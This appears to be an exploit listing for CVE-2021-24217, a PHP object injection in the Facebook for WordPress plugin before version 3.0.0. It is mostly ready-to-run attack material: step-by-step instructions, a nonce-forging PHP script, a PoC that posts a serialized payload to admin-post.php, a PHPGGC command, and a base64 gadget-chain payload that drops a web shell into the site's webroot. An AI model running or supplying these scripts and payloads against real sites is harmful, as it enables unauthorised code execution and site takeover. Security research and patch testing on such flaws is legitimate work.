Exploit for Facebook for WordPress < 3.0.0 - PHP Object Injection with POP Chain CVE-2021-24217

Name: Exploit for Facebook for WordPress < 3.0.0 - PHP Object Injection with POP Chain CVE-2021-24217
Rating: 5 (94 reviews)
2021-03-25 | CVSS 6.8
## https://sploitus.com/exploit?id=WPEX-ID:509F2754-A1A1-4142-9126-AE023A88533A
Step 1: Use the nonce generation script to generate a valid nonce.

Step 2: Run the POC script like:
php poc.php site.com nonce base64payload

Step 3: Navigate to the shell
http://mysite.com/webshell.php


Nonce Generation Script
-----
<?php

$nonce_key = '[SITE NONCE KEY HERE]';
$nonce_salt = '[SITE SALT HERE]';

function wp_nonce_tick() {

    return ceil( time() / ( 86400 / 2 ) );
}

function wp_hash( $data, $scheme = 'auth', $nonce_key, $nonce_salt) {
    $salt = $nonce_key . $nonce_salt;
    echo "Is this a real salt? " . $salt . "\n";

    return hash_hmac( 'md5', $data, $salt );
}

$i = wp_nonce_tick();

echo "Here is your Nonce: " . substr( wp_hash( $i ."wp_async_send_server_eventsFacebookPixelPlugin\Core\ServerEventAsyncTask", 'nonce', $nonce_key,
        $nonce_salt), - 12, 10 )

?>


PoC Script 

<?php

// Settings
$siteurl = $argv[1];
$nonce = $argv[2];
$payload = $argv[3];

$ch = curl_init();
curl_setopt( $ch, CURLOPT_URL, $siteurl . '/wp-admin/admin-post.php' );
curl_setopt( $ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13' );
curl_setopt( $ch, CURLOPT_PROXY, $proxy );
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, true );
curl_setopt( $ch, CURLOPT_POST, true );
curl_setopt( $ch, CURLOPT_POSTFIELDS, [
    'action' => 'wp_async_send_server_events',
    '_nonce' => $nonce,
    'num_events' => '1',
    'event_data' => $payload
] );
$output = curl_exec($ch);
curl_close($ch);
print_r($output);

?>

Generate a working payload with PHPGGC, or other custom script - make sure data is base64encoded on output so null characters don't get lost. 

./phpggc Guzzle/FW1 /var/www/html/webshell.php ~/path/to/shell.php -b

Sometimes the payload is finicky so you may need to take the payload into Burp Decoder to decode and modify your payload while keeping the null characters. The following payload should work on most standard instances:

TzozMToiR3V6emxlSHR0cFxDb29raWVcRmlsZUNvb2tpZUphciI6NDp7czo0MToiAEd1enpsZUh0dHBcQ29va2llXEZpbGVDb29raWVKYXIAZmlsZW5hbWUiO3M6MjY6Ii92YXIvd3d3L2h0bWwvd2Vic2hlbGwucGhwIjtzOjUyOiIAR3V6emxlSHR0cFxDb29raWVcRmlsZUNvb2tpZUphcgBzdG9yZVNlc3Npb25Db29raWVzIjtiOjE7czozNjoiAEd1enpsZUh0dHBcQ29va2llXENvb2tpZUphcgBjb29raWVzIjthOjE6e2k6MDtPOjI3OiJHdXp6bGVIdHRwXENvb2tpZVxTZXRDb29raWUiOjE6e3M6MzM6IgBHdXp6bGVIdHRwXENvb2tpZVxTZXRDb29raWUAZGF0YSI7YTo1OntzOjQ6Ik5hbWUiO3M6NDoidGVzdCI7czo1OiJWYWx1ZSI7czoxODoiPD9waHAgcGhwaW5mbygpOz8+IjtzOjc6IkRpc2NhcmQiO2I6MDtzOjc6IkV4cGlyZXMiO2k6MTt9fX1zOjM5OiIAR3V6emxlSHR0cFxDb29raWVcQ29va2llSmFyAHN0cmljdE1vZGUiO047fQ==